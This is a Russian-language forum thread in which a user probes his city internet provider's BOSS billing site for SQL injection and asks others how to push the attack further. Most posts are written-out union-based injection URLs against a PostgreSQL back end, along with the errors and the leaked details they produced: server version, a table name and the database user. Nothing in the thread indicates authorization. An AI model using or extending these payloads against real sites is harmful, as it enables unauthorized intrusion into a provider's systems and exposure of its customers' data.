|
В общем по сабжу.
В инъекциях практически 0. Лазил по сайту своего городского прова. В общем подставлял везде пробовал кавычки и т.д. (думал изучить как-раз для себя эту неизведанную степь -) ) И в 1 из результатов (http://site.com/BOSSclient/view_ctime.php3?Id=155348' ) Выдало такое: Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: ошибка синтаксиса в конце ввода LINE 1: SELECT single FROM sdesc WHERE idservice= ^ in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 23 Warning: pg_result(): supplied argument is not a valid PostgreSQL result resource in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 24 Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: ошибка синтаксиса в или рядом "AND" LINE 1: ...T oid,* FROM ctime WHERE Id=155348 AND idservice= AND cdate>... ^ in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 32 Как это дело раскрутить. Погуглил, пробовал многими способами, которые нашел, но ошибки не меняются. Выдает только это.(Хотя может что-то и не так делал, т.к. в этом деле полный 0 ) Подскажите , куда копать , буду очень благодарен. http://site.com/******/****_*****.php3?Id=155348' уязвимый урл . |
https://rdot.org/forum/showthread.php?t=24
|
shell_c0de, спасибо большое!
Натыкался на эту статью, попробовал несколько моментов, но что-то не пошло. Буду копать глубже в этом направлении. Вот допустим пишу по примеру так : http://site.com/BOSSclient/view_ctime.php3?Id=155348+and+1=cast((SELECT+versi on()||chr(58)||current_user||chr(58)||current_data base())+as+int)-- Выдает ту же ошибку (страница не меняется). Перепробовал почти все с этой статьи. Ничего не меняется -( Кто что может посоветовать. |
В общем определил вывод и узнал кол-во столбцов, получилось так:
http://site.com/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120207 &isrv=6&id=155348&idservice=-1+union+select+null,null,null,null,111,null,null,n ull-- Затем пробую узнать таблицу так: http://site.com/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120207 &isrv=6&id=155348&idservice=-1+union+select+null,null,null,null,TABLE_NAME,null ,null,null+from+information_schema.tables-- Выдает такие ошибки на странице : Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: каждый запрос UNION должен иметь одинаковое число колонок in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 23 И снизу: Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: UNION типы double precision и character varying не совпадают in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 32 Как быть дальше, не знаю. Помогите плиз!...) Буду очень благодарен. |
dcspirit, круто, конечно. Но у меня 401.
|
Там просто нужна авторизация.
Ну а по самой теме, что можно сделать ?( |
Вот еще методом проб и ошибок-)
http://ххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(version()+ as+double+precision),null,null,null-- Выдает нам версию - PostgreSQL 8.2.13 on amd64-portbld-freebsd7.2, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD] http://ххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(TABLE_NAME +as+double+precision),null,null,null+from+INFORMAT ION_SCHEMA.TABLES+LIMIT+1+OFFSET+1-- Выдает нам имя таблицы 1 - "views" . Далее, наращивая OFFSET выдает эту же таблицу (хотя таблиц точнодольше должно быть!) http://хххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(cast(user+ as+text)+as+double+precision),null,null,null+from+ INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+1-- Так узнаем свои права (по ходу дела, как я понял -) ) - "nobody" Т.е. прав нет считай? Подскажите, что можно сделать в данном случае... |
| Время: 21:46 |